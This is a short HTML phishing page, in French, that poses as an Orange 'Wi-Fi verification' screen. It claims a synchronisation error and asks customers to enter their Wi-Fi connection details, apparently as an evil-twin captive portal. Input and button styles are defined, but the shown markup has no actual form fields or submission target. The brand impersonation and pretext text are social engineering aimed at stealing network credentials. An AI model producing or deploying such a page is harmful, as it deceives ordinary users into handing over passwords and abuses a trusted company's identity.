<!DOCTYPE html>Orange - Vérification Wi-Fi <title>Orange - Vérification Wi-Fi</title> <style> body { font-family: sans-serif; background: #f2f2f2; text-align: center; padding-top: 50px; } .box { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px #aaa; display: inline-block; } input { display: block; margin: 15px auto; padding: 10px; width: 80%; } button { padding: 10px 20px; background: orange; border: none; color: white; font-weight: bold; } </style> <div class="box"> Orange - Vérification de votre réseau
<p>Cher(e) client(e),
Une erreur de synchronisation a été détectée sur votre réseau.
Veuillez entrer les informations de votre connexion Wi-Fi pour continuer.</p> <p style="font-size: 12px; color: #888;">Orange - Assistance Technique</p> </div>